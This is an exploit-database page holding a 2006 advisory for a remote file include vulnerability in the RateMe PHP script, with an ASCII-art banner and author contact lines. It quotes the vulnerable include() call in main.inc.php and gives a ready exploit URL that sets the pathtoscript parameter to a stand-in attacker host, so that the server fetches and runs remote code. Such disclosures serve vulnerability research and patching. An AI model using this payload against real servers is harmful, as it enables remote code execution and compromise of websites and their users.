logo
DATABASE RESOURCES PRICING ABOUT US

RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability

Description

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ...,,:: ;;ii,,:: + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: + + tt;;::..,, tt;;,, ff;;;;ii ;;ii,,:: + + tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,:: + + tt;;;;,, tt;;,,.. tt;;;; ;;ii;;:: + + ..::,,;;,, tt;;,,.. tt;;,, ;;ii,,:: + + ..::,,ii;;;;.. tt;;,,.. iiii,,:: ;;ii,,:: + + ::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,:: + + ,,;;ii tt;;,, ii;;,,.. ...jj;;:: ;;ii;;:: + ;;;;:: tt;;:: tt;;;;.. ff;;:: ;;tt,,.. + + ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,.. + + ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;.. + + tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,.. + + jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,.. + + ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;.. + + ..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,.. + + iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;; + + ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;:: ;;ii,, + + jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,, + + jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii:: + + iijjjjjjtt;; ;;ffffjjjjtt:: ;;ii + + ;;.. ii;; + + .. + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ######################################################################################################### # Affected Script: RateMe # Exploit name : RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability # Author: Al7ejaz Hacker # Website: http://www.planetluc.com/en/ not free version # Discovered: 15/12/2006 # Conatact : saudi[at]hotmail.fr - - al7ejaz.hackerz[at]gmail.com ######################################################################################################### ######################################################################################################### # # Description : # File infected : main.inc.php , line 17 # # echo "\n<!-- Start RateMe v$version output -->\n\n<link href='".$pathtoscript."style.css' rel='stylesheet' type='text/css'>\n<div class='votingtxt'>"; # include($pathtoscript.'db_connect.inc.php'); # <== # # Exploit : http://victime/path/main.inc.php?pathtoscript=http://Atacke # ########################################################################################################